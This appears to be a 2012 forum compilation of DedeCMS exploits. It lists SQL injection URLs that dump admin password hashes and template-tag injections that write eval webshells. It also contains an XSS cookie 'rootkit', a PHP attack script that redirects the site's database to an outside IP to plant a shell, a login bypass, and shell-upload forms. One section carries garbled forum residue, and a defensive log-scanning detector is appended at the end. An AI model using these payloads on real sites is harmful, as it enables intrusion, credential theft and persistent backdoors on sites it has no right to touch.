DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=15

DedeCMS v5.6 embedded malicious code execution vulnerability

Register a member account and upload a software item; in the "local address" field enter:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with the password xiao: a one-line shell is written directly.

DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage parameter XSS vulnerability

1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit". Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, however you visit either of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable overwrite getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Only the first response line is examined: "HTTP/1.1 200 OK" puts "OK" at offset 13.
if (strpos($exp,"OK")>12){
    echo "\nExploit Success\n";
    if($aid==1) echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2) echo "\nShell:".$url."/$path/fuck.php\n";
    if($aid==3) echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "\nExploit Failed\n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // Form body: the _COOKIE[GLOBALS][cfg_*] fields overwrite the database settings
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return "";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;   // status line only
    }
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

The precondition for this vulnerability is that the backend path must already be known.

DedeCMS (织梦) tag remote file write vulnerability

Precondition: you must have your own DedeCMS database prepared, then insert a row:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability

1. Register a user, go into the member backend, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit it; if it reports that the edit succeeded, we have changed the template path.

3. Visit the modified article. Assuming the aid of the article just edited is 2, we only need to request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

7 x) H3 A: f8 N, uDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
+ ]* X! D9 Q2 E, D  y$ A! X6 cGif89a{dede:field name='toby57' runphp='yes'}
: b3 ?+ b* z* w% S0 Q4 Rphpinfo();
0 _% U! I4 Z2 C{/dede:field}, O, ?, ^) m1 G5 L
保存为1.gif, y# B. Y  o( q% T
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
; R, e, M" x" {3 H" |<input type="hidden" name="aid" value="7" />
( ]: B  R( Z! ?+ A0 G/ N3 R<input type="hidden" name="mediatype" value="1" />
8 p% O& g0 {$ J0 C4 U! F" f4 V<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> * k+ F, Z* J, @3 N
<input type="hidden" name="dopost" value="save" />
" s9 r$ s/ o# t7 X4 r$ [/ p2 j; H3 Q<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
) X+ J) x1 z' D& ?3 S% k" L+ _- N<input name="addonfile" type="file" id="addonfile"/> 7 j: r  c, X( i1 d, g9 A0 W- p" o
<button class="button2" type="submit" >更改</button> 3 v9 \1 Q( D: o) d3 k
</form>   t1 l$ Z9 a7 n' {( Y

# F; m$ X( I3 W7 l- \% ^7 L* q! @% U0 j3 O' Z" f& k% u
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
( _; S6 n, p$ W/ w: x5 G- N' o; I, A发表文章,然后构造修改表单如下:
& x4 q% n: F- G, z# |; D* V) Z5 Q# W& Q) |+ q+ L

6 x2 x! e& ^8 L" t) H7 \<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 e" y. Y4 C* T8 e4 f<input type="hidden" name="dopost" value="save" />
# ?* }$ |( W5 t" s6 ]! p<input type="hidden" name="aid" value="2" /> $ C2 [/ E5 U: k9 b) Y( z
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ! D2 ?" m  g2 P- z: O; @/ v
<input type="hidden" name="channelid" value="1" />
; |8 M/ U8 D8 t3 Q+ a$ o. X8 z<input type="hidden" name="oldlitpic" value="" />
! g8 ]* t$ n- g' M* T* u; {7 x<input type="hidden" name="sortrank" value="1282049150" /> $ @% k; c4 r% ?, Z4 w4 j7 y# D  \
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
# F# X) t' ?5 g! V<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> % w: M" }( \$ ~5 r9 {; v
<select name='typeid' size='1'> 6 t0 u9 y( R+ D; R  J* J7 e
<option value='1' class='option3' selected=''>Test</option>
5 e- Z. ~8 A8 G/ D! N<select name='mtypesid' size='1'>
3 u+ O$ N. y0 Y, T& E<option value='0' selected>请选择分类...</option>
9 x  H' l; a" N2 X1 y<option value='1' class='option3' selected>aa</option></select>
# t) U5 {8 O% a4 E: Y<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>   p3 Z1 w- I* ^* y& `  B
<input type='hidden' name='dede_addonfields' value="templet"> 7 I0 _7 P2 D2 l, m
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
% w4 E% j( n2 A; u3 g8 k( Z' ^<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
% ?0 Y% b  c6 L* \' i7 }) s4 ?<button class="button2" type="submit">提交</button>
5 j, \1 r( ~2 G: F" M5 h</form>
$ C# g$ n. r/ r1 \
. F4 A& Y1 F: D8 v
5 D! K9 `. T- Y5 m2 ^: K9 c
: p# j7 h9 h  ~/ A& E
5 D: z% A- [' t
  z) i8 s1 O% m' y( h
( s2 W- f1 g$ H5 Q+ {
- f6 k- F, Q2 o7 p$ R7 x  h, b# T, F0 h4 D2 x
: v0 m& Y1 B) S

! N1 t( ~- A# k. n) p
# q5 d! c/ ]$ R& p/ u
DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The stored password is a 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 value; then remove 3 from the front and 1 from the end to get the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability

It exploits a MySQL numeric field overflow, which raises an error, together with DedeCMS writing database error messages into a PHP file whose header is not validated.

1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar; note that the form action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php file injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
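As an added example that is not part of the original post, the script below turns the request patterns shared by the PoCs above (GLOBALS/cfg_ variable overrides, the raw sql parameter of advancedsearch.php, updatexml/union injection, {dede:} tag injection, PHP code in digg_frame.php parameters, ../ traversal in oldface/templet/code, and the gotopage script injection) into detection rules and runs them over a few constructed access-log lines. The rule names, the log parser and the sample lines (RFC 5737 addresses) are this example's own assumptions, not DedeCMS code.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request keys a client must never supply: DedeCMS registered every request
# variable as a PHP global, so a GLOBALS/_COOKIE/_POST/cfg_ key rewrites the
# database or upload configuration (cfg_dbhost, cfg_basedir, cfg_imgtype ...).
OVERRIDE_KEY = re.compile(r"^(GLOBALS|_GET|_POST|_COOKIE|_SERVER|cfg_)", re.I)

# Signatures checked against every percent-decoded parameter name and value
# (the rss.php payload sits in the parameter *name*, so names are scanned too).
VALUE_RULES = [
    ("sql_injection", re.compile(r"updatexml\s*\(|extractvalue\s*\(|union\s+select", re.I)),
    ("template_tag_injection", re.compile(r"\{/?dede:", re.I)),      # {dede:php}, runphp='yes'
    ("php_code_in_param", re.compile(r"\beval\s*\(|\?>")),             # digg_frame.php mid=*/eval(
    ("path_traversal", re.compile(r"(^|[\\/])\.\.[\\/]")),             # oldface=/../, templet=../
    ("script_injection", re.compile(r"<script\b|javascript:", re.I)),  # gotopage="><script>
]

# Combined log format: client, ident, user, [time], "METHOD target proto", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def _params(data, sep="&"):
    """Decode a query string or form body (sep='&') or a Cookie header (sep=';')
    into (name, value) pairs, keeping blank values."""
    pairs = []
    for chunk in (data or "").split(sep):
        pairs.extend(parse_qsl(chunk.strip(), keep_blank_values=True))
    return pairs


def check_request(target, cookie="", body=""):
    """Return the sorted rule names triggered by one request. An access log only
    holds the request line; cookie and body are for callers that see the whole
    request (a WAF or reverse proxy), where the GLOBALS overrides usually travel."""
    url = urlsplit(target)
    params = _params(url.query) + _params(cookie, ";") + _params(body)
    found = set()
    # advancedsearch.php executed whatever the sql parameter held, so any
    # client-supplied sql parameter on that path is a finding by itself.
    if url.path.endswith("/plus/advancedsearch.php") and any(k == "sql" for k, _ in params):
        found.add("raw_sql_param")
    for name, value in params:
        if OVERRIDE_KEY.match(name):
            found.add("request_var_override")
        for rule, rx in VALUE_RULES:
            if rx.search(name) or rx.search(value):
                found.add(rule)
    return sorted(found)


def scan_log(lines):
    """Yield (client_ip, target, rules) for every log line that triggers a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        hits = check_request(target)
        if hits:
            yield ip, target, hits


# Constructed sample log (RFC 5737 documentation addresses), not captured traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512
203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88
203.0.113.9 - - [18/Oct/2012:10:43:01 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048
203.0.113.9 - - [18/Oct/2012:10:43:30 +0800] "GET /plus/digg_frame.php?mid=*/eval(%24_POST%5Bx%5D);var_dump(3);?%3E HTTP/1.1" 500 0
198.51.100.2 - - [18/Oct/2012:10:44:00 +0800] "GET /plus/list.php?tid=1&PageNo=2 HTTP/1.1" 200 7311
"""

if __name__ == "__main__":
    for ip, target, rules in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, ",".join(rules), target)
```

Only the GET-based PoCs are visible in a plain access log; the mytag_js.php and login.php overrides travel in the POST body or cookie, so check_request() takes those as extra arguments for a proxy or WAF that sees them.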